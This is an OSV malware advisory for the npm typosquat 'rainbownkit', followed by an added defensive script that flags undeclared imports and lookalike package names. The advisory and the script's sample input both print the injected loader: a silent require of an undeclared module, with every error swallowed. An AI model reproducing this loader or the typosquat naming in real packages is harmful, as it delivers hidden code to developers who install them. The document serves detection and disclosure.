rainbownkit@0.0.8 (npm)

Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC

Malicious

OSV ID

MAL-2026-6340

Ecosystem

npm

Summary

Package 'rainbownkit' is a single-character typosquat of the popular Web3 library 'rainbowkit'. Its shipped source, README, repository URL, and author metadata are copied verbatim from the unrelated 'big.js' arbitrary-precision math library, so a developer who installs it expecting RainbowKit instead receives big.js with an injected covert loader. The package's main entry (big.js and big.mjs, both referenced via the main and exports fields) contains an injected try/catch around line 606 that runs at require/import time: const doc = require("parket-slot"); doc.from_str().then(e => {}).catch(e => {}). The 'parket-slot' module is not declared in package.json; it would be pulled in transitively via the package's only declared runtime dependency 'log-taker' (^0.0.9), an undocumented niche package with no relation to the package's claimed purpose. All errors are silently swallowed, so the hidden execution is invisible to the consumer. Anyone who runs require('rainbownkit') (or any code that imports it) executes whatever code the 'parket-slot' / 'log-taker' chain delivers at that moment: a classic two-hop dependency-confusion supply-chain payload combined with name impersonation of a high-traffic Web3 package.

Source: amazon-inspector (970be1fb6306ff1e8dc6119d96404f600a1eb44a47124e2910bb9237bb80fe9a)
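The two red flags in this record, an entry file that requires a module package.json never declares and a name one edit away from a well-known package, can both be checked before a package is installed. The script below is an added example, not code from the OSV record, from Amazon Inspector, or from any of the packages it names. It scans an entry-file string for bare require()/import specifiers, compares them with the declared dependency fields, and computes the edit distance of the package name against a watch list. The package.json, entry-file excerpt and watch list are constructed here to mirror the shape the record describes (the real package's files are not reproduced).

```javascript
// Added example (not from the OSV record or from any project it names):
// a small pre-install audit reproducing two checks a reviewer would run
// against a package like the one described above.
//   1. Does the entry file require()/import modules that package.json does
//      not declare? (the 'parket-slot' hop hidden inside a try/catch)
//   2. Is the package name within one edit of a well-known package name?
//      (the 'rainbownkit' vs 'rainbowkit' typosquat)
// All inputs below are constructed to mirror the record, not copied from it.

// Node built-ins that never need a package.json entry (partial list, assumed).
const BUILTINS = new Set(["fs", "path", "os", "crypto", "http", "https", "util", "url", "events"]);

// Collect bare module names from require("x"), import x from "x", import "x", import("x").
function extractSpecifiers(source) {
  const found = new Set();
  const patterns = [
    /\brequire\s*\(\s*["']([^"']+)["']\s*\)/g,
    /\bimport\s*(?:[^"'()]*?\sfrom\s*)?["']([^"']+)["']/g,
    /\bimport\s*\(\s*["']([^"']+)["']\s*\)/g,
  ];
  for (const re of patterns) {
    let m;
    while ((m = re.exec(source)) !== null) {
      const spec = m[1];
      // Relative paths and explicit node: specifiers are not registry packages.
      if (spec.startsWith(".") || spec.startsWith("/") || spec.startsWith("node:")) continue;
      // Reduce "pkg/sub/path" to "pkg", keeping the scope for "@scope/pkg/sub".
      const parts = spec.split("/");
      const name = spec.startsWith("@") ? parts.slice(0, 2).join("/") : parts[0];
      if (!BUILTINS.has(name)) found.add(name);
    }
  }
  return [...found].sort();
}

// Imported package names that no dependency field of package.json declares.
function undeclaredImports(pkgJson, source) {
  const declared = new Set();
  for (const field of ["dependencies", "optionalDependencies", "peerDependencies"]) {
    for (const name of Object.keys(pkgJson[field] || {})) declared.add(name);
  }
  return extractSpecifiers(source).filter((name) => !declared.has(name));
}

// Levenshtein edit distance (single-row dynamic programming).
function editDistance(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0]; // value of the previous row at column j-1
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j];
      prev[j] = Math.min(
        prev[j] + 1,                                    // deletion
        prev[j - 1] + 1,                                // insertion
        diag + (a[i - 1] === b[j - 1] ? 0 : 1),         // substitution / match
      );
      diag = tmp;
    }
  }
  return prev[b.length];
}

// Well-known names within maxDistance edits of the candidate (exact matches excluded).
function typosquatCandidates(name, wellKnown, maxDistance = 1) {
  return wellKnown.filter((w) => w !== name && editDistance(name, w) <= maxDistance);
}

// Constructed package.json mirroring the record: a single declared runtime dependency.
const SAMPLE_PKG_JSON = {
  name: "rainbownkit",
  version: "0.0.8",
  main: "big.js",
  dependencies: { "log-taker": "^0.0.9" },
};

// Constructed entry-file excerpt: a harmless helper plus the injected loader shape
// the record describes (require of an undeclared module, every error swallowed).
const SAMPLE_ENTRY = `
"use strict";
var crypto = require("crypto");
function noop() {}
try {
  const doc = require("parket-slot");
  doc.from_str().then(e => {}).catch(e => {});
} catch (e) {}
module.exports = { noop };
`;

// Constructed watch list; a real one would come from a registry popularity feed.
const WELL_KNOWN = ["rainbowkit", "big.js", "lodash", "express", "wagmi"];

function audit(pkgJson = SAMPLE_PKG_JSON, source = SAMPLE_ENTRY, wellKnown = WELL_KNOWN) {
  return {
    undeclared: undeclaredImports(pkgJson, source),
    lookalikes: typosquatCandidates(pkgJson.name, wellKnown),
  };
}

console.log(JSON.stringify(audit(), null, 2));
// → { "undeclared": ["parket-slot"], "lookalikes": ["rainbowkit"] }
```

In a lockfile-gating job the same two functions would run over every newly added package's tarball contents rather than over embedded strings; the regex scan is a cheap first pass, and a hit on either check is a reason to hold the PR for manual review, not a verdict on its own.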
